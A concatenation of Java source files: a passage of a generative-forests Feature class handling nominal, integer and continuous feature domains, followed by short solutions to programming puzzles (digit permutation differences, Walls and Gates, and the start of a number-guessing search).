if (type.equals(Feature.NOMINAL)){
if (f.modalities == null)
Dataset.perror("FeatureTest.class :: empty modalities in Feature for test's consistency");
int i;
Vector<String> vs = getStringTest(ds);
if (check_non_zero_measure){
// must have a modality not in tests AND test contain at least one element
boolean found = false;
if (vs.size() == 0)
Dataset.perror("FeatureTest.class :: [check_non_zero_measure] test has no String " + f);
// checks that at least 1 modality of f is in the test (goes left)
found = false;
i = 0;
do{
if (vs.contains(f.modalities.elementAt(i)))
found = true;
else
i++;
}while( (!found) && (i<f.modalities.size()) );
if (!found)
Dataset.perror("FeatureTest.class :: all modalities of " + this + " are not in " + f);
// checks that at least 1 modality of f is not in the test (goes right)
found = false;
i = 0;
do{
if (!vs.contains(f.modalities.elementAt(i)))
found = true;
else
i++;
}while( (!found) && (i<f.modalities.size()) );
if (!found)
Dataset.perror("FeatureTest.class :: all modalities of " + f + " are in " + this);
}
}else if (type.equals(Feature.CONTINUOUS)){
// does NOT ensure non zero measure
if ((double_test < f.dmin) || (double_test > f.dmax))
Dataset.perror(
"FeatureTest.class :: test value " + double_test + " not in domain of Feature " + f);
if (check_non_zero_measure){
// check double_test \in (f.dmin, f.dmax)
if ((double_test <= f.dmin) || (double_test >= f.dmax))
Dataset.perror(
"FeatureTest.class :: [check_non_zero_measure] test value "
+ double_test
+ " not strictly in domain of Feature "
+ f);
}
}else if (type.equals(Feature.INTEGER)){
// does NOT ensure non zero measure
if ((int_test < f.imin) || (int_test > f.imax))
Dataset.perror(
"FeatureTest.class :: test value " + int_test + " not in domain of Feature " + f);
if (check_non_zero_measure){
// check int_test \in {f.imin, f.min + 1, ..., f.imax - 1}
if (int_test == f.imax)
Dataset.perror(
"FeatureTest.class :: [check_non_zero_measure] test value "
+ int_test
+ " equals the right bound of Feature "
+ f);
}
}
}
public double getDoubleTest(){
//checkConsistency();
if (!type.equals(Feature.CONTINUOUS))
Dataset.perror("FeatureTest.class :: unauthorized call for double w/ type " + type);
return double_test;
}
public int getIntTest(){
//checkConsistency();
if (!type.equals(Feature.INTEGER))
Dataset.perror("FeatureTest.class :: unauthorized call for integer w/ type " + type);
return int_test;
}
public BoolArray getBoolArrayToStringTest(){
//checkConsistency();
if (!type.equals(Feature.NOMINAL))
Dataset.perror("FeatureTest.class :: unauthorized call for nominal w/ type " + type);
return boolarray_to_string_test;
}
public Vector<String> getStringTest(Dataset ds){
Feature fds = ds.features.elementAt(ds.indexOfFeature(name));
checkConsistency(fds);
Vector<String> vs = new Vector<>();
if (boolarray_to_string_test.size() != fds.modalities.size())
Dataset.perror(
"FeatureTest.class :: BoolArray "
+ boolarray_to_string_test
+ " of different *size* ("
+ boolarray_to_string_test.size()
+ ") than the number of modalities ("
+ fds.modalities.size()
+ ")");
int i;
for (i=0;i<fds.modalities.size();i++)
if (boolarray_to_string_test.get(i))
vs.addElement(new String(fds.modalities.elementAt(i)));
return vs;
}
public String toString(Dataset ds){
String v = name;
int i;
Vector <String> ssv;
if (Feature.IS_CONTINUOUS(type))
v += " <= " + DF6.format(double_test);
else if (Feature.IS_INTEGER(type))
v += " <= " + int_test;
else if (Feature.IS_NOMINAL(type)){
v += " in {";
ssv = getStringTest(ds);
for (i = 0; i < ssv.size();i++){
v += ssv.elementAt(i);
if (i<ssv.size() - 1)
v += ", ";
}
v += "}";
}else
Dataset.perror("FeatureTest.class :: no type available for feature " + this);
return v;
}
}
/**************************************************************************************************************************************
* Class FeatureValue
* provides encapsulation for all types that a feature can take, incl. unknown value
*****/
class FeatureValue implements Debuggable{
public static String S_UNKNOWN = "-1";
public static boolean IS_UNKNOWN(double d){
String s = "" + d;
return s.equals(S_UNKNOWN);
}
public static boolean IS_UNKNOWN(int i){
String s = "" + i;
return s.equals(S_UNKNOWN);
}
public static boolean IS_UNKNOWN(String s){
return s.equals(S_UNKNOWN);
}
public static boolean IS_UNKNOWN(Object o){
if (!o.getClass().getSimpleName().equals("FeatureValue"))
return false;
FeatureValue v = (FeatureValue) o;
if (v.type.equals(Feature.UNKNOWN_VALUE))
return true;
return false;
}
boolean is_unknown;
double dv;
int iv;
String sv;
String type;
FeatureValue(){
is_unknown = true;
type = Feature.UNKNOWN_VALUE;
iv = Feature.FORBIDDEN_VALUE;
dv = (double) Feature.FORBIDDEN_VALUE;
sv = "" + Feature.FORBIDDEN_VALUE;
}
FeatureValue(String s){
sv = s;
is_unknown = false;
type = Feature.NOMINAL;
iv = Feature.FORBIDDEN_VALUE;
dv = (double) Feature.FORBIDDEN_VALUE;
}
FeatureValue(double d){
dv = d;
is_unknown = false;
type = Feature.CONTINUOUS;
iv = Feature.FORBIDDEN_VALUE;
sv = "" + Feature.FORBIDDEN_VALUE;
}
FeatureValue(int i){
iv = i;
is_unknown = false;
type = Feature.INTEGER;
dv = (double) Feature.FORBIDDEN_VALUE;
sv = "" + Feature.FORBIDDEN_VALUE;
}
public String toString(){
if (type.equals(Feature.UNKNOWN_VALUE))
return "[?]";
else if (type.equals(Feature.NOMINAL))
return sv;
else if (type.equals(Feature.INTEGER))
return "" + iv;
else if (type.equals(Feature.CONTINUOUS))
return "" + dv;
else
Dataset.perror("FeatureValue.class :: no such type as " + type);
return "";
}
public static FeatureValue copyOf(FeatureValue fv){
if (fv.type.equals(Feature.UNKNOWN_VALUE))
return new FeatureValue();
else if (fv.type.equals(Feature.NOMINAL))
return new FeatureValue(fv.sv);
else if (fv.type.equals(Feature.CONTINUOUS))
return new FeatureValue(fv.dv);
else if (fv.type.equals(Feature.INTEGER))
return new FeatureValue(fv.iv);
Dataset.perror("FeatureValue.class :: no value type " + fv.type);
return new FeatureValue();
}
public boolean equals(Object o){
if (o == this)
return true;
if (!(o instanceof FeatureValue))
return false;
FeatureValue fv = (FeatureValue) o;
if (!fv.type.equals(type))
return false;
if ( (is_unknown) && (fv.is_unknown) )
return true;
else if ( (!is_unknown) && (fv.is_unknown) )
return false;
else if ( (is_unknown) && (!fv.is_unknown) )
return false;
if ( (type.equals(Feature.NOMINAL)) && (!sv.equals(fv.sv)) )
return false;
else if ( (type.equals(Feature.INTEGER)) && (iv != fv.iv) )
return false;
else if ( (type.equals(Feature.CONTINUOUS)) && (dv != fv.dv) )
return false;
return true;
}
}
/**************************************************************************************************************************************
* Class Feature
*****/
class Feature implements Debuggable{
public static String NOMINAL = "NOMINAL",
CONTINUOUS = "CONTINUOUS",
INTEGER = "INTEGER",
UNKNOWN_VALUE = "UNKNOWN_VALUE";
public static String TYPE[] = {Feature.NOMINAL, Feature.CONTINUOUS, Feature.INTEGER};
public static int TYPE_INDEX(String s){
int i = 0;
while(i<TYPE.length){
if (TYPE[i].equals(s))
return i;
i++;
}
return -1;
}
public static String DISPERSION_NAME[] = {"Entropy", "Variance", "Variance"};
// Discriminator relevant variables
public static int NUMBER_CONTINUOUS_TIES = 100;
// splits the interval in this number of internal splits (results in N+1 subintervals) FOR CONTINUOUS VARIABLES
public static int FORBIDDEN_VALUE = -100000;
// value to initialise doubles and int. Must not be in dataset
public static boolean DISPLAY_TESTS = true;
// All purpose variables
String name;
String type;
//Restricted to domain features, to collect the info about data (useful for splits)
double [] observed_doubles;
int [] observed_ints;
//Feature specific domain stuff -- redesign w/ a specific class for Generics
//characterisation of feature's domain
Vector <String> modalities; //applies only to Feature.NOMINAL features
double dmin, dmax; //applies only to Feature.CONTINUOUS features
int imin, imax; //applies only to Feature.INTEGER features
double dispertion_statistic_value;
// Entropy for nominal, variance for ordered
public static String SAVE_FEATURE(Feature f){
String ret = "";
ret += f.name + "\t" + f.type + "\t";
int i;
if (Feature.IS_NOMINAL(f.type)){
if (f.modalities == null)
ret += "null";
else if (f.modalities.size() == 0)
ret += "{}";
else
for (i=0;i<f.modalities.size();i++){
ret += (String) f.modalities.elementAt(i);
if (i<f.modalities.size()-1)
ret += "\t";
}
}else if (Feature.IS_CONTINUOUS(f.type)){
ret += f.dmin + "\t" + f.dmax;
}else if (Feature.IS_INTEGER(f.type)){
ret += f.imin + "\t" + f.imax;
}
return ret;
}
public double length(){
double l = -1.0;
if (Feature.IS_CONTINUOUS(type))
l = dmax - dmin;
else if (Feature.IS_INTEGER(type))
l = (double) imax - (double) imin + 1.0;
else if (Feature.IS_NOMINAL(type))
l = (double) modalities.size();
if (l<0.0)
Dataset.perror("Feature.class :: feature " + this + " has <0 length");
return l;
}
public boolean equals(Object o){
int i, j;
if (o == this)
return true;
if (!(o instanceof Feature))
return false;
Feature f = (Feature) o;
if (!(( ( (Feature.IS_NOMINAL(f.type)) && (Feature.IS_NOMINAL(type)) )
|| ( (Feature.IS_INTEGER(f.type)) && (Feature.IS_INTEGER(type)) )
|| ( (Feature.IS_CONTINUOUS(f.type)) && (Feature.IS_CONTINUOUS(type)) ) )))
return false;
if (Feature.IS_INTEGER(f.type))
if ( (f.imin != imin) || (f.imax != imax) )
return false;
if (Feature.IS_CONTINUOUS(f.type))
if ( (f.dmin != dmin) || (f.dmax != dmax) )
return false;
if (Feature.IS_NOMINAL(f.type)){
if (f.modalities.size() != modalities.size())
return false;
for (i=0;i<f.modalities.size();i++)
if (!((String) f.modalities.elementAt(i)).equals(modalities.elementAt(i)))
return false;
}
return true;
}
public static Feature copyOf(Feature f){
Vector <String> v = null;
double miv = (double) Feature.FORBIDDEN_VALUE, mav = (double) Feature.FORBIDDEN_VALUE;
if (Feature.IS_NOMINAL(f.type))
v = new Vector<String> (f.modalities);
else if (Feature.IS_CONTINUOUS(f.type)){
miv = f.dmin;
mav = f.dmax;
}else if (Feature.IS_INTEGER(f.type)){
miv = f.imin;
mav = f.imax;
}
Feature fn = new Feature(f.name, f.type, v, miv, mav);
if (Feature.IS_CONTINUOUS(f.type)){
fn.imin = fn.imax = Feature.FORBIDDEN_VALUE;
}else if (Feature.IS_INTEGER(f.type)){
fn.dmin = fn.dmax = Feature.FORBIDDEN_VALUE;
}else if (Feature.IS_NOMINAL(f.type)){
fn.imin = fn.imax = Feature.FORBIDDEN_VALUE;
fn.dmin = fn.dmax = Feature.FORBIDDEN_VALUE;
}
return fn;
}
public static boolean OBSERVATION_MATCHES_FEATURE(Observation e, Feature f, int f_index){
// checks whether e.typed_features.elementAt(f_index) is in domain of f
if (e.typed_features.elementAt(f_index).type.equals(Feature.UNKNOWN_VALUE))
Dataset.perror("Feature.class :: forbidden unknown value for OBSERVATION_MATCHES_FEATURE");
//return true;
String f_type = e.typed_features.elementAt(f_index).type;
double ed;
int ei;
String es;
if (f_type.equals(Feature.CONTINUOUS)){
if (!Feature.IS_CONTINUOUS(f.type))
Dataset.perror("Feature.class :: feature type mismatch -- CONTINUOUS");
ed = e.typed_features.elementAt(f_index).dv;
if ( (ed >= f.dmin) && (ed <= f.dmax) )
return true;
else
return false;
}else if (f_type.equals(Feature.INTEGER)){
if (!Feature.IS_INTEGER(f.type))
Dataset.perror("Feature.class :: feature type mismatch -- INTEGER");
ei = e.typed_features.elementAt(f_index).iv;
if ( (ei >= f.imin) && (ei <= f.imax) )
return true;
else
return false;
}else if (f_type.equals(Feature.NOMINAL)){
if (!Feature.IS_NOMINAL(f.type))
Dataset.perror("Feature.class :: feature type mismatch -- NOMINAL");
es = e.typed_features.elementAt(f_index).sv;
if (f.modalities.contains(es))
return true;
else
return false;
}else
Dataset.perror("Feature.class :: feature type unknown");
return true;
}
public static Feature CAP(Feature[] features, boolean ensure_non_zero_measure){
// cheaper option to compute the intersection of any number of features
// proceeds by feature; if one \cap returns null, returns null
if ( (features == null) || (features.length == 0) )
Dataset.perror("Feature.class :: no intersection possible with 0 features");
int i, j;
String n = "", t;
for (i=0;i<features.length-1;i++){
if (!features[i].type.equals(features[i + 1].type))
Dataset.perror(
"Feature.class :: no intersection possible between features of different types");
if (!features[i].name.equals(features[i + 1].name))
Dataset.perror(
"Feature.class :: no intersection possible between features of different names");
}
t = features[0].type;
n = features[0].name;
if (Feature.IS_CONTINUOUS(t)){
double cap_dmin = -1.0, cap_dmax = -1.0;
for (i=0;i<features.length;i++){
if ( (i==0) || (features[i].dmin > cap_dmin) ){
cap_dmin = features[i].dmin;
}
if ( (i==0) || (features[i].dmax < cap_dmax) ){
cap_dmax = features[i].dmax;
}
}
System.out.println(n + "{" + cap_dmin + "," + cap_dmax + "}");
if ( (cap_dmin > cap_dmax) || ( (cap_dmin == cap_dmax) && (ensure_non_zero_measure) ) )
return null;
return new Feature(n, t, null, cap_dmin, cap_dmax);
}else if (Feature.IS_INTEGER(t)){
int cap_imin = -1, cap_imax = -1;
for (i=0;i<features.length;i++){
if ( (i==0) || (features[i].imin > cap_imin) ){
cap_imin = features[i].imin;
}
if ( (i==0) || (features[i].imax < cap_imax) ){
cap_imax = features[i].imax;
}
}
if (cap_imin > cap_imax)
return null;
return new Feature(n, t, null, (double) cap_imin, (double) cap_imax);
}else if (Feature.IS_NOMINAL(t)){
Vector <String> cap_string = null;
int sinit;
for (i=0;i<features.length;i++){
if (i==0)
cap_string = new Vector<>((Vector <String>) features[0].modalities);
else{
sinit = cap_string.size();
for (j=sinit-1;j>=0;j--){
if (!features[i].modalities.contains(cap_string.elementAt(j)))
cap_string.removeElementAt(j);
}
}
}
if ( (cap_string == null) || (cap_string.size() == 0) )
return null;
return new Feature(n, t, cap_string, -1.0, -1.0);
}else
Dataset.perror("Feature.class :: no type " + t + " for feature intersection");
return null;
}
public Feature cap(Feature t, boolean ensure_non_zero_measure){
// return the intersection feature: EXPENSIVE REPLACE BY CAP
if ( (!name.equals(t.name)) || (!type.equals(t.type)) )
Dataset.perror("Feature.class :: feature intersection between different features");
Feature ret = Feature.copyOf(this);
int i;
if (Feature.IS_CONTINUOUS(type)){
if ( ( (ensure_non_zero_measure) && ( (dmax <= t.dmin) || (dmin >= t.dmax) ) )
|| ( (!ensure_non_zero_measure) && ( (dmax < t.dmin) || (dmin > t.dmax) ) ) )
return null;
ret.dmin = (dmin >= t.dmin) ? dmin : t.dmin;
ret.dmax = (dmax <= t.dmax) ? dmax : t.dmax;
}else if (Feature.IS_INTEGER(type)){
if ( (imax < t.imin) || (imin > t.imax) )
return null;
if (imax == t.imin){
ret.imin = ret.imax = imax;
}else if (imin == t.imax){
ret.imin = ret.imax = imin;
}else{
ret.imin = (imin >= t.imin) ? imin : t.imin;
ret.imax = (imax <= t.imax) ? imax : t.imax;
}
}else if (Feature.IS_NOMINAL(type)){
if ( (modalities == null) || (t.modalities == null) )
return null;
Vector <String> inter = new Vector<>();
for (i=0;i<modalities.size();i++)
if (t.modalities.contains(modalities.elementAt(i)))
inter.addElement(new String(modalities.elementAt(i)));
ret.modalities = inter;
}else
Dataset.perror("Feature.class :: feature type unknown");
return ret;
}
public static void TEST_UNION(Feature f_parent, Feature f_left, Feature f_right){
// controls the union of the children features is the parent
// ensures the children have non-empty domain
int i;
if ((!f_parent.type.equals(f_left.type)) || (!f_parent.type.equals(f_right.type)))
Dataset.perror(
"Feature.class :: parent feature of type "
+ f_parent.type
+ " but children: "
+ f_left.type
+ ", "
+ f_right.type);
if (Feature.IS_CONTINUOUS(f_parent.type)){
if ( (f_left.dmin != f_parent.dmin) || (f_right.dmax != f_parent.dmax) )
Dataset.perror("Feature.class :: double domain does not cover parent's range");
if (f_left.dmax != f_right.dmin)
Dataset.perror("Feature.class :: double domain union mismatch");
}else if (Feature.IS_INTEGER(f_parent.type)){
if ( (f_left.imin != f_parent.imin) || (f_right.imax != f_parent.imax) )
Dataset.perror("Feature.class :: integer domain does not cover parent's range");
if (f_left.imax + 1 != f_right.imin)
Dataset.perror(
"Feature.class :: integer domain union mismatch : f_left.imax = "
+ f_left.imax
+ ", f_right.imin = "
+ f_right.imin);
}else if (Feature.IS_NOMINAL(f_parent.type)){
if ( (f_left.modalities == null) || (f_right.modalities == null) )
Dataset.perror("Feature.class :: nominal domain has null domain in a child");
if ( (f_left.modalities.size() == 0) || (f_right.modalities.size() == 0) )
Dataset.perror("Feature.class :: nominal domain has empty domain in a child");
if (f_parent.modalities == null)
Dataset.perror("Feature.class :: nominal domain has null domain in parent");
if (f_parent.modalities.size() == 0)
Dataset.perror("Feature.class :: nominal domain has empty domain in parent");
for (i = 0; i < f_left.modalities.size(); i++)
if (!f_parent.modalities.contains((String) f_left.modalities.elementAt(i)))
Dataset.perror(
"Feature.class :: parent's nominal domain does not contain left child modality "
+ ((String) f_left.modalities.elementAt(i)));
for (i = 0; i < f_right.modalities.size(); i++)
if (!f_parent.modalities.contains((String) f_right.modalities.elementAt(i)))
Dataset.perror(
"Feature.class :: parent's nominal domain does not contain right child modality "
+ ((String) f_right.modalities.elementAt(i)));
if (f_left.modalities.size() + f_right.modalities.size() != f_parent.modalities.size())
Dataset.perror(
"Feature.class :: parent's nominal domain contains modalities not in children");
}
}
public static boolean IS_SUBFEATURE(Feature a, Feature b){
// checks if domain(a) \subseteq domain(b)
return IS_SUBFEATURE(a, -1, b, -1);
}
public static boolean IS_SUBFEATURE(Feature a, int index_a, Feature b, int index_b){
// checks if domain(a) \subseteq domain(b) AND returns an error if index_a != index_b (in myDomain.myDS.features)
// also checks inconsistencies: one of a or b must be a subfeature of the other AND the feature type values must have been computed
boolean anotinb, bnotina;
int i, ia, ib;
if (index_a != index_b)
Dataset.perror("Feature.class :: not the same feature (" + index_a + " != " + index_b + ")");
if (!a.type.equals(b.type))
Dataset.perror(
"Feature.class :: not the same type of feature (" + a.type + " != " + b.type + ")");
if (IS_CONTINUOUS(a.type)){
if (a.dmin >= b.dmin){
if (a.dmax <= b.dmax) return true;
else
Dataset.perror(
"Feature.class :: inconsistency for subfeature check for : ("
+ a.dmin
+ ", "
+ a.dmax
+ ") subseteq ("
+ b.dmin
+ ", "
+ b.dmax
+ ") ? ");
} else if (a.dmax < b.dmax)
Dataset.perror(
"Feature.class :: inconsistency for subfeature check for : ("
+ a.dmin
+ ", "
+ a.dmax
+ ") subseteq ("
+ b.dmin
+ ", "
+ b.dmax
+ ") ? ");
}else if (IS_INTEGER(a.type)){
if (a.imin >= b.imin){
if (a.imax <= b.imax) return true;
else
Dataset.perror(
"Feature.class :: inconsistency for subfeature check for : ("
+ a.imin
+ ", "
+ a.imax
+ ") subseteq ("
+ b.imin
+ ", "
+ b.imax
+ ") ? ");
} else if (a.imax < b.imax)
Dataset.perror(
"Feature.class :: inconsistency for subfeature check for : ("
+ a.imin
+ ", "
+ a.imax
+ ") subseteq ("
+ b.imin
+ ", "
+ b.imax
+ ") ? ");
}else if (IS_NOMINAL(a.type)){
if (a.modalities == null)
return true;
else if (b.modalities != null){
anotinb = bnotina = false;
ia = ib = -1;
for (i=0;i<a.modalities.size();i++)
if (!b.modalities.contains((String) a.modalities.elementAt(i))){
anotinb = true;
ia = i;
}
for (i=0;i<b.modalities.size();i++)
if (!a.modalities.contains((String) b.modalities.elementAt(i))){
bnotina = true;
ib = i;
}
if ((anotinb) && (bnotina))
Dataset.perror(
"Feature.class :: inconsistency for subfeature check for : "
+ ((String) a.modalities.elementAt(ia))
+ " not in b and "
+ ((String) b.modalities.elementAt(ib))
+ " not in a ");
else if (!anotinb) return true;
}
}else
Dataset.perror("Feature.class :: no Feature type for " + a.type);
return false;
}
public static boolean IS_CONTINUOUS(String t){
return (t.equals(Feature.CONTINUOUS));
}
public static boolean IS_INTEGER(String t){
// equiv. to Nominal Mono-valued, ordered
return (t.equals(Feature.INTEGER));
}
static boolean IS_NOMINAL(String t){
// Nominal Mono-Valued, no order
return (t.equals(Feature.NOMINAL));
}
static int INDEX(String t){
int i = 0;
do {
if (t.equals(TYPE[i]))
return i;
i++;
}while(i < TYPE.length);
Dataset.perror("No type found for " + t);
return -1;
}
public static Feature DOMAIN_FEATURE(String n, String t, Vector <String> m, Vector <Double> vd, Vector <Integer> vi, double miv, double mav){
Feature f = new Feature(n, t, m, miv, mav);
int i;
if (f.type.equals(Feature.CONTINUOUS)){
f.observed_doubles = new double[vd.size()];
for (i=0;i<vd.size();i++)
f.observed_doubles[i] = vd.elementAt(i).doubleValue();
Arrays.sort(f.observed_doubles);
}
if (f.type.equals(Feature.INTEGER)){
f.observed_ints = new int[vi.size()];
for (i=0;i<vi.size();i++)
f.observed_ints[i] = vi.elementAt(i).intValue();
Arrays.sort(f.observed_ints);
}
return f;
}
Feature(String n, String t, Vector <String> m, double miv, double mav){
name = n;
type = t;
modalities = null;
observed_doubles = null;
observed_ints = null;
if (((Feature.IS_CONTINUOUS(t)) || (Feature.IS_INTEGER(t))) && (miv > mav))
Dataset.perror(
"Feature.class :: Continuous or Integer feature has min value "
+ miv
+ " > max value "
+ mav);
else if ((Feature.IS_NOMINAL(t)) && (miv < mav))
Dataset.perror(
"Feature.class :: Nominal feature "
+ name
+ " has min value = "
+ miv
+ ", max value = "
+ mav
+ ", should be default Forbidden value "
+ Feature.FORBIDDEN_VALUE);
if ((Feature.IS_CONTINUOUS(t)) && (miv >= mav))
Dataset.perror(
"Feature.class :: Continuous feature "
+ n
+ " has min value "
+ miv
+ " >= max value "
+ mav);
if ((!Feature.IS_NOMINAL(t))
&& ((miv == (double) Feature.FORBIDDEN_VALUE) && (mav == (double) Feature.FORBIDDEN_VALUE)))
Dataset.perror(
"Feature.class :: Non nominal feature "
+ n
+ " has min value "
+ Feature.FORBIDDEN_VALUE
+ " == max value "
+ Feature.FORBIDDEN_VALUE
+ " = Forbidden value");
if (Feature.IS_CONTINUOUS(t)){
dmin = miv;
dmax = mav;
imin = imax = Feature.FORBIDDEN_VALUE;
}else if (Feature.IS_INTEGER(t)){
imin = (int) miv;
imax = (int) mav;
dmin = dmax = (double) Feature.FORBIDDEN_VALUE;
}else{
imin = imax = Feature.FORBIDDEN_VALUE;
dmin = dmax = (double) Feature.FORBIDDEN_VALUE;
}
if (Feature.IS_NOMINAL(t))
modalities = m;
dispertion_statistic_value = -1.0;
}
Feature(String n, String t, Vector <String> m, double miv, double mav, boolean check_non_zero_measure){
name = n;
type = t;
modalities = null;
observed_doubles = null;
observed_ints = null;
if (((Feature.IS_CONTINUOUS(t)) || (Feature.IS_INTEGER(t))) && (miv > mav))
Dataset.perror(
"Feature.class :: Continuous or Integer feature has min value "
+ miv
+ " > max value "
+ mav);
else if ((Feature.IS_NOMINAL(t)) && (miv < mav))
Dataset.perror(
"Feature.class :: Nominal feature "
+ name
+ " has min value = "
+ miv
+ ", max value = "
+ mav
+ ", should be default Forbidden value "
+ Feature.FORBIDDEN_VALUE);
if ((Feature.IS_CONTINUOUS(t)) && (miv >= mav) && (check_non_zero_measure))
Dataset.perror(
"Feature.class :: Continuous feature "
+ n
+ " has min value "
+ miv
+ " >= max value "
+ mav);
if ((!Feature.IS_NOMINAL(t))
&& ((miv == (double) Feature.FORBIDDEN_VALUE) && (mav == (double) Feature.FORBIDDEN_VALUE)))
Dataset.perror(
"Feature.class :: Non nominal feature "
+ n
+ " has min value "
+ Feature.FORBIDDEN_VALUE
+ " == max value "
+ Feature.FORBIDDEN_VALUE
+ " = Forbidden value");
if (Feature.IS_CONTINUOUS(t)){
dmin = miv;
dmax = mav;
imin = imax = Feature.FORBIDDEN_VALUE;
}else if (Feature.IS_INTEGER(t)){
imin = (int) miv;
imax = (int) mav;
dmin = dmax = (double) Feature.FORBIDDEN_VALUE;
}else{
imin = imax = Feature.FORBIDDEN_VALUE;
dmin = dmax = (double) Feature.FORBIDDEN_VALUE;
}
if (Feature.IS_NOMINAL(t))
modalities = m;
dispertion_statistic_value = -1.0;
}
// ALL PURPOSE INSTANCE METHODS
public boolean has_in_range(double v){
if ( (Feature.IS_NOMINAL(type)) || (Feature.IS_INTEGER(type)) )
Dataset.perror("Feature.class :: feature " + this + " queried for double value " + v);
if (!Feature.IS_CONTINUOUS(type))
Dataset.perror("Feature.class :: feature type " + type + " unregistered ");
if (v < dmin)
return false;
if (v > dmax)
return false;
return true;
}
public boolean has_in_range(int v){
if ( (Feature.IS_NOMINAL(type)) || (Feature.IS_CONTINUOUS(type)) )
Dataset.perror("Feature.class :: feature " + this + " queried for double value " + v);
if (!Feature.IS_INTEGER(type))
Dataset.perror("Feature.class :: feature type " + type + " unregistered ");
if (v < imin)
return false;
if (v > imax)
return false;
return true;
}
public boolean has_in_range(String s){
if ((Feature.IS_CONTINUOUS(type)) || (Feature.IS_INTEGER(type)))
Dataset.perror(
"Feature.class :: Continuous feature " + this + " queried for nominal value " + s);
if (!Feature.IS_NOMINAL(type))
Dataset.perror("Feature.class :: feature type " + type + " unregistered ");
int i;
String ss;
for (i=0;i<modalities.size();i++){
ss = (String) modalities.elementAt(i);
if (ss.equals(s))
return true;
}
return false;
}
public boolean has_in_range(FeatureValue v){
if (!type.equals(v.type))
Dataset.perror(
"Feature.class :: Feature "
+ this
+ " not of the same type as value "
+ v
+ " => cannot contain it");
if ( ( (Feature.IS_NOMINAL(type)) && (has_in_range(v.sv)) )
|| ( (Feature.IS_CONTINUOUS(type)) && (has_in_range(v.dv)) )
|| ( (Feature.IS_INTEGER(type)) && (has_in_range(v.iv)) ) )
return true;
return false;
}
public String range(boolean in_generator){
String v = "";
int i;
if (Feature.IS_NOMINAL(type)){
v += "{";
for (i=0;i<modalities.size();i++){
v += "" + modalities.elementAt(i);
if (i<modalities.size() - 1)
v += ", ";
}
v += "}";
}else if (Feature.IS_CONTINUOUS(type)){
v += "[" + DF4.format(dmin) + ", " + DF4.format(dmax) + "]";
}else if (Feature.IS_INTEGER(type)){
if (imax == imin)
v += "{" + imin + "}";
else{
v += "{" + imin + ", " + (imin + 1) ;
if (imax > imin + 2)
v += ", ...";
if (imax > imin + 1)
v += ", " + imax;
v += "}";
}
}
return v;
}
public String toString(){
String v = "";
int i;
v +=
name
+ " -- "
+ type
+ " in "
+ range(false)
+ " ["
+ Feature.DISPERSION_NAME[Feature.TYPE_INDEX(type)]
+ " = "
+ DF4.format(dispertion_statistic_value)
+ "]";
return v;
}
public String toShortString(){
String v = "";
int i;
v += "[ " + name + " : " + type + " in " + range(false) + " ]";
return v;
}
public String toStringInTree(boolean internalnode){
String v = "";
int i;
if (internalnode)
v += name + " (" + type + ") in " + range(true) + ";";
else
v += "(" + name + " in " + range(true) + ")";
return v;
}
}
| google-research/google-research | generative_forests/src/Feature.java |
1,176 | /**
* Given any positive integer, if we permute its digits, the difference between the number we get and the
* given number will always be divisible by 9.
* For example, if the given number is 123, we may rearrange the digits to get 321. The difference =
* 321 - 123 = 198, which is a multiple of 9 (198 = 9 × 22).
* We can prove this fact fairly easily, but since we are not having a maths contest, we instead try to
* illustrate this fact with the help of a computer program.
* Input
* Each line of input gives a positive integer n (≤ 2000000000). You are to find two integers a and b
* formed by rearranging the digits of n, such that a − b is maximum. a and b should NOT have leading
* zeros.
* Output
* You should then show that a − b is a multiple of 9, by expressing it as ‘9 * k’, where k is an integer.
* See the sample output for the correct output format.
* Sample Input
* 123
* 2468
* Sample Output
* 321 - 123 = 198 = 9 * 22
* 8642 - 2468 = 6174 = 9 * 686
*/
//https://uva.onlinejudge.org/index.php?option=onlinejudge&Itemid=99999999&page=show_problem&category=&problem=2366
import java.util.Arrays;
import java.util.Scanner;
public class NumberTheoryForNewbies {
public static void main(String[] args) {
Scanner input = new Scanner(System.in);
while (input.hasNextLong()) {
String inputValue = input.nextLine();
StringBuilder minimal = new StringBuilder();
StringBuilder maximal = new StringBuilder();
char[] characters = inputValue.toCharArray();
int length = characters.length;
Arrays.sort(characters);
int index;
for (index = 0; index < length; index++) {
if (characters[index] != '0') {
break;
}
}
if (index != 0) {
characters[0] = characters[index];
characters[index] = '0';
}
for (int i = 0; i < length; i++) {
minimal.append(characters[i]);
}
Arrays.sort(characters);
for (int i = length - 1; i > -1; i--) {
maximal.append(characters[i]);
}
long maximalNumber = Long.valueOf(maximal.toString());
long minimalNumber = Long.valueOf(minimal.toString());
long difference = maximalNumber - minimalNumber;
System.out.println(maximal + " - " + minimal + " = " + difference
+ " = 9 * " + (difference / 9));
}
}
}
| kdn251/interviews | uva/NumberTheoryForNewbies.java |
1,178 | // You are given a m x n 2D grid initialized with these three possible values.
// -1 - A wall or an obstacle.
// 0 - A gate.
// INF - Infinity means an empty room. We use the value 231 - 1 = 2147483647 to represent INF as you may assume that the distance to a gate is less than 2147483647.
// Fill each empty room with the distance to its nearest gate. If it is impossible to reach a gate, it should be filled with INF.
// For example, given the 2D grid:
// INF -1 0 INF
// INF INF INF -1
// INF -1 INF -1
// 0 -1 INF INF
// After running your function, the 2D grid should be:
// 3 -1 0 1
// 2 2 1 -1
// 1 -1 2 -1
// 0 -1 3 4
public class WallsAndGates {
public void wallsAndGates(int[][] rooms) {
//iterate through the matrix calling dfs on all indices that contain a zero
for(int i = 0; i < rooms.length; i++) {
for(int j = 0; j < rooms[0].length; j++) {
if(rooms[i][j] == 0) {
dfs(rooms, i, j, 0);
}
}
}
}
void dfs(int[][] rooms, int i, int j, int distance) {
//if you have gone out of the bounds of the array or you have run into a wall/obstacle, return
// room[i][j] < distance also ensure that we do not overwrite any previously determined distance if it is shorter than our current distance
if(i < 0 || i >= rooms.length || j < 0 || j >= rooms[0].length || rooms[i][j] < distance) {
return;
}
//set current index's distance to distance
rooms[i][j] = distance;
//recurse on all adjacent neighbors of rooms[i][j]
dfs(rooms, i + 1, j, distance + 1);
dfs(rooms, i - 1, j, distance + 1);
dfs(rooms, i, j + 1, distance + 1);
dfs(rooms, i, j - 1, distance + 1);
}
}
| kdn251/interviews | company/google/WallsAndGates.java |
1,179 | // We are playing the Guess Game. The game is as follows:
// I pick a number from 1 to n. You have to guess which number I picked.
// Every time you guess wrong, I'll tell you whether the number is higher or lower.
// You call a pre-defined API guess(int num) which returns 3 possible results (-1, 1, or 0):
// -1 : My number is lower
// 1 : My number is higher
// 0 : Congrats! You got it!
// Example:
// n = 10, I pick 6.
// Return 6.
public class GuessNumberHigherOrLower extends GuessGame {
public int guessNumber(int n) {
int left = 1;
